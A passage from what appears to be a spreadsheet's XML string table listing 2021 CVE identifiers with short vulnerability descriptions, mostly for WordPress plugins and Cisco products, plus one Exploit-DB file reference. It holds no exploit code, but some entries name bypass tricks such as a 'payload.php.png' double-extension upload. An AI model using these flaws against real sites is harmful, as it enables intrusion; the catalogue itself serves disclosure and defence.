    <t>A vulnerability in the image uploader component found in the ~/src/Classes/ImageUploader.php file of the ProfilePress WordPress plugin made it possible for users to upload arbitrary files during user registration or during profile updates. This issue affects versions 3.0.0 - 3.1.3. .</t>
  </si>
  <si>
    <t>CVE-2021-34624</t>
  </si>
  <si>
    <t>A vulnerability in the file uploader component found in the ~/src/Classes/FileUploader.php file of the ProfilePress WordPress plugin made it possible for users to upload arbitrary files during user registration or during profile updates. This issue affects versions 3.0.0 - 3.1.3. .</t>
  </si>
  <si>
    <t>CVE-2021-34625</t>
  </si>
  <si>
    <t>A vulnerability in the saveCustomType function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to inject arbitrary web scripts. This issue affects versions 2.2.3 and prior.</t>
  </si>
  <si>
    <t>CVE-2021-34626</t>
  </si>
  <si>
    <t>A vulnerability in the deleteCustomType function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to delete custom extensions added by administrators. This issue affects versions 2.2.3 and prior.</t>
  </si>
  <si>
    <t>CVE-2021-34627</t>
  </si>
  <si>
    <t>A vulnerability in the getSelectedMimeTypesByRole function of the WP Upload Restriction WordPress plugin allows low-level authenticated users to view custom extensions added by administrators. This issue affects versions 2.2.3 and prior.</t>
  </si>
  <si>
    <t>CVE-2021-34628</t>
  </si>
  <si>
    <t>The Admin Custom Login WordPress plugin is vulnerable to Cross-Site Request Forgery due to the loginbgSave action found in the ~/includes/Login-form-setting/Login-form-background.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.2.7.</t>
  </si>
  <si>
    <t>CVE-2021-34629</t>
  </si>
  <si>
    <t>The SendGrid WordPress plugin is vulnerable to authorization bypass via the get_ajax_statistics function found in the ~/lib/class-sendgrid-statistics.php file which allows authenticated users to export statistic for a WordPress multi-site main site, in versions up to and including 1.11.8.</t>
  </si>
  <si>
    <t>CVE-2021-3463</t>
  </si>
  <si>
    <t>A null pointer dereference vulnerability in Lenovo Power Management Driver for Windows 10, prior to version 1.67.17.54, that could cause systems to experience a blue screen error.</t>
  </si>
  <si>
    <t>CVE-2021-34630</t>
  </si>
  <si>
    <t>In the Pro and Enterprise versions of GTranslate &lt; 2.8.65, the gtranslate_request_uri_var function runs at the top of all pages and echoes out the contents of $_SERVER['REQUEST_URI']. Although this uses addslashes, and most modern browsers automatically URLencode requests, this plugin is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below, or in cases where an attacker is able to modify the request en route between the client and the server, or in cases where the user is using an atypical browsing solution.</t>
  </si>
  <si>
    <t>CVE-2021-34631</t>
  </si>
  <si>
    <t>The NewsPlugin WordPress plugin is vulnerable to Cross-Site Request Forgery via the handle_save_style function found in the ~/news-plugin.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.18.</t>
  </si>
  <si>
    <t>CVE-2021-34632</t>
  </si>
  <si>
    <t>The SEO Backlinks WordPress plugin is vulnerable to Cross-Site Request Forgery via the loc_config function found in the ~/seo-backlinks.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 4.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-34633</t>
  </si>
  <si>
    <t>The Youtube Feeder WordPress plugin is vulnerable to Cross-Site Request Forgery via the printAdminPage function found in the ~/youtube-feeder.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-34634</t>
  </si>
  <si>
    <t>The Nifty Newsletters WordPress plugin is vulnerable to Cross-Site Request Forgery via the sola_nl_wp_head function found in the ~/sola-newsletters.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 4.0.23.</t>
  </si>
  <si>
    <t>CVE-2021-34635</t>
  </si>
  <si>
    <t>The Poll Maker WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the mcount parameter found in the ~/admin/partials/settings/poll-maker-settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.2.8.</t>
  </si>
  <si>
    <t>CVE-2021-34636</t>
  </si>
  <si>
    <t>The Countdown and CountUp, WooCommerce Sales Timers WordPress plugin is vulnerable to Cross-Site Request Forgery via the save_theme function found in the ~/includes/admin/coundown_theme_page.php file due to a missing nonce check which allows attackers to inject arbitrary web scripts, in versions up to and including 1.5.7.</t>
  </si>
  <si>
    <t>CVE-2021-34637</t>
  </si>
  <si>
    <t>The Post Index WordPress plugin is vulnerable to Cross-Site Request Forgery via the OptionsPage function found in the ~/php/settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.7.5.</t>
  </si>
  <si>
    <t>CVE-2021-34638</t>
  </si>
  <si>
    <t>Authenticated Directory Traversal in WordPress Download Manager &lt;= 3.1.24 allows authenticated (Contributor+) users to obtain sensitive configuration file information, as well as allowing Author+ users to perform XSS attacks, by setting Download template to a file containing configuration information or an uploaded JavaScript with an image extension This issue affects: WordPress Download Manager version 3.1.24 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-34639</t>
  </si>
  <si>
    <t>Authenticated File Upload in WordPress Download Manager &lt;= 3.1.24 allows authenticated (Author+) users to upload files with a double extension, e.g. "payload.php.png" which is executable in some configurations. This issue affects: WordPress Download Manager version 3.1.24 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-3464</t>
  </si>
  <si>
    <t>A DLL search path vulnerability was reported in Lenovo PCManager, prior to version 3.0.400.3252, that could allow privilege escalation.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50299.py</t>
  </si>
  <si>
    <t>WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass</t>
  </si>
  <si>
    <t>2021-09-17</t>
  </si>
  <si>
    <t>CVE-2021-34640</t>
  </si>
  <si>
    <t>The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4.</t>
  </si>
  <si>
    <t>CVE-2021-34641</t>
  </si>
  <si>
    <t>The SEOPress WordPress plugin is vulnerable to Stored Cross-Site-Scripting via the processPut function found in the ~/src/Actions/Api/TitleDescriptionMeta.php file which allows authenticated attackers to inject arbitrary web scripts, in versions 5.0.0 - 5.0.3.</t>
  </si>
  <si>
    <t>CVE-2021-34642</t>
  </si>
  <si>
    <t>The Smart Email Alerts WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the api_key in the ~/views/settings.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.10.</t>
  </si>
  <si>
    <t>CVE-2021-34643</t>
  </si>
  <si>
    <t>The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2.</t>
  </si>
  <si>
    <t>CVE-2021-34644</t>
  </si>
  <si>
    <t>The Multiplayer Games WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/multiplayergames.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.7.</t>
  </si>
  <si>
    <t>CVE-2021-34645</t>
  </si>
  <si>
    <t>The Shopping Cart &amp; eCommerce Store WordPress plugin is vulnerable to Cross-Site Request Forgery via the save_currency_settings function found in the ~/admin/inc/wp_easycart_admin_initial_setup.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 5.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-34646</t>
  </si>
  <si>
    <t>Versions up to, and including, 5.4.3, of the Booster for WooCommerce WordPress plugin are vulnerable to authentication bypass via the process_email_verification function due to a random token generation weakness in the reset_and_mail_activation_link function found in the ~/includes/class-wcj-emails-verification.php file. This allows attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Email Verification module to be active in the plugin and the Login User After Successful Verification setting to be enabled, which it is by default.</t>
  </si>
  <si>
    <t>CVE-2021-34647</t>
  </si>
  <si>
    <t>The Ninja Forms WordPress plugin is vulnerable to sensitive information disclosure via the bulk_export_submissions function found in the ~/includes/Routes/Submissions.php file, in versions up to and including 3.5.7. This allows authenticated attackers to export all Ninja Forms submissions data via the /ninja-forms-submissions/export REST API which can include personally identifiable information.</t>
  </si>
  <si>
    <t>CVE-2021-34648</t>
  </si>
  <si>
    <t>The Ninja Forms WordPress plugin is vulnerable to arbitrary email sending via the trigger_email_action function found in the ~/includes/Routes/Submissions.php file, in versions up to and including 3.5.7. This allows authenticated attackers to send arbitrary emails from the affected server via the /ninja-forms-submissions/email-action REST API which can be used to socially engineer victims.</t>
  </si>
  <si>
    <t>CVE-2021-34649</t>
  </si>
  <si>
    <t>The Simple Behance Portfolio WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the `dark` parameter in the ~/titan-framework/iframe-font-preview.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.2.</t>
  </si>
  <si>
    <t>CVE-2021-34650</t>
  </si>
  <si>
    <t>The eID Easy WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the error parameter found in the ~/admin.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 4.6.</t>
  </si>
  <si>
    <t>CVE-2021-34651</t>
  </si>
  <si>
    <t>The Scribble Maps WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the map parameter in the ~/includes/admin.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.2.</t>
  </si>
  <si>
    <t>CVE-2021-34652</t>
  </si>
  <si>
    <t>The Media Usage WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the id parameter in the ~/mmu_admin.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.0.4.</t>
  </si>
  <si>
    <t>CVE-2021-34653</t>
  </si>
  <si>
    <t>The WP Fountain WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/wp-fountain.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.5.9.</t>
  </si>
  <si>
    <t>CVE-2021-34654</t>
  </si>
  <si>
    <t>The Custom Post Type Relations WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the cptr[name] parameter found in the ~/pages/admin-page.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-34655</t>
  </si>
  <si>
    <t>The WP Songbook WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the url parameter found in the ~/inc/class.ajax.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.11.</t>
  </si>
  <si>
    <t>CVE-2021-34656</t>
  </si>
  <si>
    <t>The 2Way VideoCalls and Random Chat - HTML5 Webcam Videochat WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the `vws_notice` function found in the ~/inc/requirements.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 5.2.7.</t>
  </si>
  <si>
    <t>CVE-2021-34657</t>
  </si>
  <si>
    <t>The 2TypoFR WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the text function found in the ~/vendor/Org_Heigl/Hyphenator/index.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.11.</t>
  </si>
  <si>
    <t>CVE-2021-34658</t>
  </si>
  <si>
    <t>The Simple Popup Newsletter WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/simple-popup-newsletter.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.4.7.</t>
  </si>
  <si>
    <t>CVE-2021-34659</t>
  </si>
  <si>
    <t>The Plugmatter Pricing Table Lite WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the `email` parameter in the ~/license.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.32.</t>
  </si>
  <si>
    <t>CVE-2021-3466</t>
  </si>
  <si>
    <t>A flaw was found in libmicrohttpd. A missing bounds check in the post_process_urlencoded function leads to a buffer overflow, allowing a remote attacker to write arbitrary data in an application that uses libmicrohttpd. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. Only version 0.9.70 is vulnerable.</t>
  </si>
  <si>
    <t>CVE-2021-34660</t>
  </si>
  <si>
    <t>The WP Fusion Lite WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the startdate parameter found in the ~/includes/admin/logging/class-log-table-list.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.37.18.</t>
  </si>
  <si>
    <t>CVE-2021-34661</t>
  </si>
  <si>
    <t>The WP Fusion Lite WordPress plugin is vulnerable to Cross-Site Request Forgery via the `show_logs_section` function found in the ~/includes/admin/logging/class-log-handler.php file which allows attackers to drop all logs for the plugin, in versions up to and including 3.37.18.</t>
  </si>
  <si>
    <t>CVE-2021-34663</t>
  </si>
  <si>
    <t>The jQuery Tagline Rotator WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/jquery-tagline-rotator.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 0.1.5.</t>
  </si>
  <si>
    <t>CVE-2021-34664</t>
  </si>
  <si>
    <t>The Moova for WooCommerce WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the lat parameter in the ~/Checkout/Checkout.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.</t>
  </si>
  <si>
    <t>CVE-2021-34665</t>
  </si>
  <si>
    <t>The WP SEO Tags WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the saq_txt_the_filter parameter in the ~/wp-seo-tags.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.2.7.</t>
  </si>
  <si>
    <t>CVE-2021-34666</t>
  </si>
  <si>
    <t>The Add Sidebar WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the add parameter in the ~/wp_sidebarMenu.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 2.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-34667</t>
  </si>
  <si>
    <t>The Calendar_plugin WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of `$_SERVER['PHP_SELF']` in the ~/calendar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.0.</t>
  </si>
  <si>
    <t>CVE-2021-34668</t>
  </si>
  <si>
    <t>The WordPress Real Media Library WordPress plugin is vulnerable to Stored Cross-Site Scripting via the name parameter in the ~/inc/overrides/lite/rest/Folder.php file which allows author-level attackers to inject arbitrary web scripts in folder names, in versions up to and including 4.14.1.</t>
  </si>
  <si>
    <t>CVE-2021-3467</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the way Jasper versions before 2.0.26 handled component references in CDEF box in the JP2 image format decoder. A specially crafted JP2 image file could cause an application using the Jasper library to crash when opened.</t>
  </si>
  <si>
    <t>CVE-2021-34675</t>
  </si>
  <si>
    <t>Basix NEX-Forms through 7.8.7 allows authentication bypass for stored PDF reports.</t>
  </si>
  <si>
    <t>CVE-2021-34676</t>
  </si>
  <si>
    <t>Basix NEX-Forms through 7.8.7 allows authentication bypass for Excel report generation.</t>
  </si>
  <si>
    <t>CVE-2021-34679</t>
  </si>
  <si>
    <t>Thycotic Password Reset Server before 5.3.0 allows credential disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-3468</t>
  </si>
  <si>
    <t>A flaw was found in avahi in versions 0.6 up to 0.8. The event used to signal the termination of the client connection on the avahi Unix socket is not correctly handled in the client_work function, allowing a local attacker to trigger an infinite loop. The highest threat from this vulnerability is to the availability of the avahi service, which becomes unresponsive after this flaw is triggered.</t>
  </si>
  <si>
    <t>CVE-2021-34682</t>
  </si>
  <si>
    <t>Receita Federal IRPF 2021 1.7 allows a man-in-the-middle attack against the update feature.</t>
  </si>
  <si>
    <t>CVE-2021-34683</t>
  </si>
  <si>
    <t>An issue was discovered in EXCELLENT INFOTEK CORPORATION (EIC) E-document System 3.0. A remote attacker can use kw/auth/bbs/asp/get_user_email_info_bbs.asp to obtain the contact information (name and e-mail address) of everyone in the entire organization. This information can allow remote attackers to perform social engineering or brute force attacks against the system login page.</t>
  </si>
  <si>
    <t>CVE-2021-34684</t>
  </si>
  <si>
    <t>Hitachi Vantara Pentaho Business Analytics through 9.1 allows an unauthenticated user to execute arbitrary SQL queries on any Pentaho data source and thus retrieve data from the related databases, as demonstrated by an api/repos/dashboards/editor URI.</t>
  </si>
  <si>
    <t>CVE-2021-34685</t>
  </si>
  <si>
    <t>UploadService in Hitachi Vantara Pentaho Business Analytics through 9.1 does not properly verify uploaded user files, which allows an authenticated user to upload various files of different file types. Specifically, a .jsp file is not allowed, but a .jsp. file is allowed (and leads to remote code execution).</t>
  </si>
  <si>
    <t>CVE-2021-34687</t>
  </si>
  <si>
    <t>iDrive RemotePC before 7.6.48 on Windows allows information disclosure. A man in the middle can recover a system's Personal Key when a client attempts to make a LAN connection. The Personal Key is transmitted over the network while only being encrypted via a substitution cipher.</t>
  </si>
  <si>
    <t>CVE-2021-34688</t>
  </si>
  <si>
    <t>iDrive RemotePC before 7.6.48 on Windows allows information disclosure. A locally authenticated attacker can read an encrypted version of the system's Personal Key in world-readable %PROGRAMDATA% log files. The encryption is done using a hard-coded static key and is therefore reversible by an attacker.</t>
  </si>
  <si>
    <t>CVE-2021-34689</t>
  </si>
  <si>
    <t>iDrive RemotePC before 7.6.48 on Windows allows information disclosure. A locally authenticated attacker can read the system's Personal Key in world-readable %PROGRAMDATA% log files.</t>
  </si>
  <si>
    <t>CVE-2021-3469</t>
  </si>
  <si>
    <t>Foreman versions before 2.3.4 and before 2.4.0 is affected by an improper authorization handling flaw. An authenticated attacker can impersonate the foreman-proxy if product enable the Puppet Certificate authority (CA) to sign certificate requests that have subject alternative names (SANs). Foreman do not enable SANs by default and `allow-authorization-extensions` is set to `false` unless user change `/etc/puppetlabs/puppetserver/conf.d/ca.conf` configuration explicitly.</t>
  </si>
  <si>
    <t>CVE-2021-34690</t>
  </si>
  <si>
    <t>iDrive RemotePC before 7.6.48 on Windows allows authentication bypass. A remote and unauthenticated attacker can bypass cloud authentication to connect and control a system via TCP port 5970 and 5980.</t>
  </si>
  <si>
    <t>CVE-2021-34691</t>
  </si>
  <si>
    <t>iDrive RemotePC before 4.0.1 on Linux allows denial of service. A remote and unauthenticated attacker can disconnect a valid user session by connecting to an ephemeral port.</t>
  </si>
  <si>
    <t>CVE-2021-34692</t>
  </si>
  <si>
    <t>iDrive RemotePC before 7.6.48 on Windows allows privilege escalation. A local and low-privileged user can force RemotePC to execute an attacker-controlled executable with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34693</t>
  </si>
  <si>
    <t>net/can/bcm.c in the Linux kernel through 5.12.10 allows local users to obtain sensitive information from kernel stack memory because parts of a data structure are uninitialized.</t>
  </si>
  <si>
    <t>CVE-2021-34696</t>
  </si>
  <si>
    <t>A vulnerability in the access control list (ACL) programming of Cisco ASR 900 and ASR 920 Series Aggregation Services Routers could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to incorrect programming of hardware when an ACL is configured using a method other than the configuration CLI. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to bypass an ACL on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-34697</t>
  </si>
  <si>
    <t>A vulnerability in the Protection Against Distributed Denial of Service Attacks feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct denial of service (DoS) attacks to or through the affected device. This vulnerability is due to incorrect programming of the half-opened connections limit, TCP SYN flood limit, or TCP SYN cookie features when the features are configured in vulnerable releases of Cisco IOS XE Software. An attacker could exploit this vulnerability by attempting to flood traffic to or through the affected device. A successful exploit could allow the attacker to initiate a DoS attack to or through an affected device.</t>
  </si>
  <si>
    <t>CVE-2021-34698</t>
  </si>
  <si>
    <t>A vulnerability in the proxy service of Cisco AsyncOS for Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to exhaust system memory and cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper memory management in the proxy service of an affected device. An attacker could exploit this vulnerability by establishing a large number of HTTPS connections to the affected device. A successful exploit could allow the attacker to cause the system to stop processing new connections, which could result in a DoS condition. Note: Manual intervention may be required to recover from this situation.</t>
  </si>
  <si>
    <t>CVE-2021-34699</t>
  </si>
  <si>
    <t>A vulnerability in the TrustSec CLI parser of Cisco IOS and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. This vulnerability is due to an improper interaction between the web UI and the CLI parser. An attacker could exploit this vulnerability by requesting a particular CLI command to be run through the web UI. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2021-3470</t>
  </si>
  <si>
    <t>A heap overflow issue was found in Redis in versions before 5.0.10, before 6.0.9 and before 6.2.0 when using a heap allocator other than jemalloc or glibc's malloc, leading to potential out of bound write or process crash. Effectively this flaw does not affect the vast majority of users, who use jemalloc or glibc malloc.</t>
  </si>
  <si>
    <t>CVE-2021-34700</t>
  </si>
  <si>
    <t>A vulnerability in the CLI interface of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to read arbitrary files on the underlying file system of an affected system. This vulnerability exists because access to sensitive information on an affected system is not sufficiently controlled. An attacker could exploit this vulnerability by gaining unauthorized access to sensitive information on an affected system. A successful exploit could allow the attacker to create forged authentication requests and gain unauthorized access to the web UI of an affected system.</t>
  </si>
  <si>
    <t>CVE-2021-34701</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM &amp;amp; Presence Service (Unified CM IM&amp;amp;P), and Cisco Unity Connection could allow an authenticated, remote attacker to access sensitive data on an affected device. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to access sensitive files on the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-34702</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information. This vulnerability is due to improper enforcement of administrator privilege levels for low-value sensitive data. An attacker with read-only administrator access to the web-based management interface could exploit this vulnerability by browsing to the page that contains the sensitive data. A successful exploit could allow the attacker to collect sensitive information regarding the configuration of the system.</t>
  </si>
  <si>
    <t>CVE-2021-34703</t>
  </si>
  <si>
    <t>A vulnerability in the Link Layer Discovery Protocol (LLDP) message parser of Cisco IOS Software and Cisco IOS XE Software could allow an attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to improper initialization of a buffer. An attacker could exploit this vulnerability via any of the following methods: An authenticated, remote attacker could access the LLDP neighbor table via either the CLI or SNMP while the device is in a specific state. An unauthenticated, adjacent attacker could corrupt the LLDP neighbor table by injecting specific LLDP frames into the network and then waiting for an administrator of the device or a network management system (NMS) managing the device to retrieve the LLDP neighbor table of the device via either the CLI or SNMP. An authenticated, adjacent attacker with SNMP read-only credentials or low privileges on the device CLI could corrupt the LLDP neighbor table by injecting specific LLDP frames into the network and then accessing the LLDP neighbor table via either the CLI or SNMP. A successful exploit could allow the attacker to cause the affected device to crash, resulting in a reload of the device.</t>
  </si>
  <si>
    <t>CVE-2021-34704</t>
  </si>
  <si>
    <t>A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to trigger a denial of service (DoS) condition. This vulnerability is due to improper input validation when parsing HTTPS requests. An attacker could exploit this vulnerability by sending a malicious HTTPS request to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2021-34705</t>
  </si>
  <si>
    <t>A vulnerability in the Voice Telephony Service Provider (VTSP) service of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to bypass configured destination patterns and dial arbitrary numbers. This vulnerability is due to insufficient validation of dial strings at Foreign Exchange Office (FXO) interfaces. An attacker could exploit this vulnerability by sending a malformed dial string to an affected device via either the ISDN protocol or SIP. A successful exploit could allow the attacker to conduct toll fraud, resulting in unexpected financial impact to affected customers.</t>
  </si>
  <si>
    <t>CVE-2021-34706</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information or conduct a server-side request forgery (SSRF) attack through an affected device. This vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by uploading a crafted XML file that contains references to external entities. A successful exploit could allow the attacker to retrieve files from the local system, resulting in the disclosure of sensitive information, or cause the web application to perform arbitrary HTTP requests on behalf of the attacker.</t>
  </si>
  <si>
    <t>CVE-2021-34707</t>
  </si>
  <si>
    <t>A vulnerability in the REST API of Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to access sensitive data on an affected system. This vulnerability exists because the application does not sufficiently protect sensitive data when responding to an API request. An attacker could exploit the vulnerability by sending a specific API request to the affected application. A successful exploit could allow the attacker to obtain sensitive information about the application.</t>
  </si>
  <si>
    <t>CVE-2021-34708</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in image verification checks of Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for Cisco 8000 Series Routers could allow an authenticated, local attacker to execute arbitrary code on the underlying operating system. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34709</t>
  </si>
  <si>
    <t>CVE-2021-34710</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Cisco ATA 190 Series Analog Telephone Adapter Software could allow an attacker to perform a command injection attack resulting in remote code execution or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-34711</t>
  </si>
  <si>
    <t>A vulnerability in the debug shell of Cisco IP Phone software could allow an authenticated, local attacker to read any file on the device file system. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by providing crafted input to a debug shell command. A successful exploit could allow the attacker to read any file on the device file system.</t>
  </si>
  <si>
    <t>CVE-2021-34712</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct cypher query language injection attacks on an affected system. This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the interface of an affected system. A successful exploit could allow the attacker to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-34713</t>
  </si>
  <si>
    <t>A vulnerability in the Layer 2 punt code of Cisco IOS XR Software running on Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, adjacent attacker to cause the affected line card to reboot. This vulnerability is due to incorrect handling of specific Ethernet frames that cause a spin loop that can make the network processors unresponsive. An attacker could exploit this vulnerability by sending specific types of Ethernet frames on the segment where the affected line cards are attached. A successful exploit could allow the attacker to cause the affected line card to reboot.</t>
  </si>
  <si>
    <t>CVE-2021-34714</t>
  </si>
  <si>
    <t>A vulnerability in the Unidirectional Link Detection (UDLD) feature of Cisco FXOS Software, Cisco IOS Software, Cisco IOS XE Software, Cisco IOS XR Software, and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause an affected device to reload. This vulnerability is due to improper input validation of the UDLD packets. An attacker could exploit this vulnerability by sending specifically crafted UDLD packets to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition. Note: The UDLD feature is disabled by default, and the conditions to exploit this vulnerability are strict. An attacker must have full control of a directly connected device. On Cisco IOS XR devices, the impact is limited to the reload of the UDLD process.</t>
  </si>
  <si>
    <t>CVE-2021-34715</t>
  </si>
  <si>
    <t>A vulnerability in the image verification function of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker to execute code with internal user privileges on the underlying operating system. The vulnerability is due to insufficient validation of the content of upgrade packages. An attacker could exploit this vulnerability by uploading a malicious archive to the Upgrade page of the administrative web interface. A successful exploit could allow the attacker to execute code with user-level privileges (the _nobody account) on the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2021-34716</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker to execute arbitrary code on the underlying operating system as the root user. This vulnerability is due to incorrect handling of certain crafted software images that are uploaded to the affected device. An attacker could exploit this vulnerability by authenticating to the system as an administrative user and then uploading specific crafted software images to the affected device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system as the root user.</t>
  </si>
  <si>
    <t>CVE-2021-34718</t>
  </si>
  <si>
    <t>A vulnerability in the SSH Server process of Cisco IOS XR Software could allow an authenticated, remote attacker to overwrite and read arbitrary files on the local device. This vulnerability is due to insufficient input validation of arguments that are supplied by the user for a specific file transfer method. An attacker with lower-level privileges could exploit this vulnerability by specifying Secure Copy Protocol (SCP) parameters when authenticating to a device. A successful exploit could allow the attacker to elevate their privileges and retrieve and upload files on a device that they should not have access to.</t>
  </si>
  <si>
    <t>CVE-2021-34719</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker with a low-privileged account to elevate privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-3472</t>
  </si>
  <si>
    <t>A flaw was found in xorg-x11-server in versions before 1.20.11. An integer underflow can occur in xserver which can lead to a local privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-34720</t>
  </si>
  <si>
